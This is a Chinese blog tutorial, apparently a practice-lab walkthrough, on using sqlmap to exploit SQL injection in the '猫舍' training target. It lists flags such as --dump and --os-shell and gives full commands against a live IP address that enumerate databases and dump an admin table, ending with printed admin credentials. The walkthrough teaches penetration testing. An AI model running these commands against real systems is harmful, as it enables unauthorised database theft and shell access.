SQL注入之猫舍之sqlmap的使用
2021/11/9 19:39:51
本文主要是介绍SQL注入之猫舍之sqlmap的使用,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
先说一下最常用的基础指令
-u 指定注入点(一般为url栏的网址)
--dbs 跑库名
--tables 跑表名
--columns 跑字段名
--dump 枚举数据(高危指令,容易进去)
-D 库名 指定数据库
-T 表名 指定表
-C 字段名 指定字段
这里就是更高级一点的指令
--random-agent 选择随机user-agents头
--delay=1 每次探测延迟一秒(防止访问过快被BAN)
--count 查看数据量(比--dump温柔,不会显示敏感信息)
-- proxy"http://127.0.0.1:1080" 使用本地1080端口
--level 1-5 测试等级,等级越高检测越详细,例如level大于2会检测cookie注入,大于3会检测头注入
--risk 一般都用 --level 3 --risk 2
--is-dba 查询当前用户权限,如果DBA是true可以尝试直接拿webshell
--os-shell 尝试往网站中放入一个cmdshell(拥有cmd权限的shell)
需要选择写入shell的脚本语言
好,现在开始正式进入SQL注入子猫舍之sqlmap工具的用法
首先需要检查sqlmap是否能正常使用,在cmd中将文件路径cd为工具所在路径,然后输入如下命令
如果看到了下面的景象,那么恭喜你,工具并无大碍
接着就使用上面提到的指令-u http://59.63.200.79:8003/?id=1,就会自动进行漏洞检测
然后就会显示漏洞检测的结果有两个:基于布尔类型的盲注和基于时间的盲注
但是并没有我们发现的显错注入,这就是工具的弊端,所以不能依赖工具!不能依赖工具!不能依赖工具!
我们默认我们都发现了显错注入漏洞,只是用工具来解放双手
所以现在就要准备提取信息,先定位库和表
先看看有哪些库 python sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs
这个就是查询到的结果
然后可以使用-u http://59.63.200.79:8003/?id=1 -D maoshe --tables来看看maoshe库里有哪些表主要是寻找admin表,当然其他库也要看看,这里只是因为我们知道maoshe库里有我们想要的东西
这个就是查询到的结果
现在就可以使用能吃牢饭的高危指令(一般做渗透测试未经受援不能查看敏感信息) -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin --dump
来查看admin表里的信息
得到了最后需要的
username:admin
password:hellohack
工具用起来只要知道命令就非常简单,但是工具也只是是没有自主意识的工具,不能完全代替手注所以
不能依赖工具!
不能依赖工具!
不能依赖工具!
这篇关于SQL注入之猫舍之sqlmap的使用的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-09百万架构师第十二课:源码分析:Spring 源码分析:Spring系统概述及IOC实现原理|JavaGuide
- 2025-01-08如何用关键链方法突破项目管理瓶颈?
- 2025-01-08电商人必看!6 款提升团队协作与客户满意度软件!
- 2025-01-08电商团队管理混乱?快用这 6 款软件优化协作流程!
- 2025-01-08短剧制作效率低?试试这5款任务管理工具
- 2025-01-08高效应对电商高峰,6 款团队协作软件大揭秘!
- 2025-01-08为什么外贸人都爱上了在线协作工具?
- 2025-01-08提升工作效率,从这些任务管理工具开始
- 2025-01-08新年电商订单暴增,必备的 6 款可视化协作办公软件有哪些?
- 2025-01-08短剧制作经理必备技能与工具全解析